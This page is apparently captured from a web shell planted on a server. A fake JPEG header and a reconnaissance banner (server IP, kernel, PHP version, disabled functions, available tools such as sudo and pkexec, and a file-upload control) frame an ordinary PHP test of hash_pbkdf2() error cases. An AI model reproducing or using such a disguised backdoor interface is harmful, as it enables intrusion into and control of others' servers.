????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.22.120.195 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/self/root/home/b8009/php-5.6.22/ext/hash/tests/ |
Upload File : |
--TEST-- Test hash_pbkdf2() function : error functionality --SKIPIF-- <?php extension_loaded('hash') or die('skip: hash extension not loaded.'); ?> --FILE-- <?php /* {{{ proto string hash_pbkdf2(string algo, string password, string salt, int iterations [, int length = 0, bool raw_output = false]) Generate a PBKDF2 hash of the given password and salt Returns lowercase hexbits by default */ echo "*** Testing hash_pbkdf2() : error conditions ***\n"; $password = 'password'; $salt = 'salt'; echo "\n-- Testing hash_pbkdf2() function with less than expected no. of arguments --\n"; var_dump(@hash_pbkdf2()); echo $php_errormsg . "\n"; var_dump(@hash_pbkdf2('crc32')); echo $php_errormsg . "\n"; var_dump(@hash_pbkdf2('crc32', $password)); echo $php_errormsg . "\n"; var_dump(@hash_pbkdf2('crc32', $password, $salt)); echo $php_errormsg . "\n"; echo "\n-- Testing hash_pbkdf2() function with more than expected no. of arguments --\n"; var_dump(@hash_pbkdf2('crc32', $password, $salt, 10, 10, true, 'extra arg')); echo $php_errormsg . "\n"; echo "\n-- Testing hash_pbkdf2() function with invalid hash algorithm --\n"; var_dump(@hash_pbkdf2('foo', $password, $salt, 1)); echo $php_errormsg . "\n"; echo "\n-- Testing hash_pbkdf2() function with invalid iterations --\n"; var_dump(@hash_pbkdf2('md5', $password, $salt, 0)); echo $php_errormsg . "\n"; var_dump(@hash_pbkdf2('md5', $password, $salt, -1)); echo $php_errormsg . "\n"; echo "\n-- Testing hash_pbkdf2() function with invalid length --\n"; var_dump(@hash_pbkdf2('md5', $password, $salt, 1, -1)); echo $php_errormsg . "\n\n"; ?> ===Done=== --EXPECT-- *** Testing hash_pbkdf2() : error conditions *** -- Testing hash_pbkdf2() function with less than expected no. of arguments -- NULL hash_pbkdf2() expects at least 4 parameters, 0 given NULL hash_pbkdf2() expects at least 4 parameters, 1 given NULL hash_pbkdf2() expects at least 4 parameters, 2 given NULL hash_pbkdf2() expects at least 4 parameters, 3 given -- Testing hash_pbkdf2() function with more than expected no. of arguments -- NULL hash_pbkdf2() expects at most 6 parameters, 7 given -- Testing hash_pbkdf2() function with invalid hash algorithm -- bool(false) hash_pbkdf2(): Unknown hashing algorithm: foo -- Testing hash_pbkdf2() function with invalid iterations -- bool(false) hash_pbkdf2(): Iterations must be a positive integer: 0 bool(false) hash_pbkdf2(): Iterations must be a positive integer: -1 -- Testing hash_pbkdf2() function with invalid length -- bool(false) hash_pbkdf2(): Length must be greater than or equal to 0: -1 ===Done===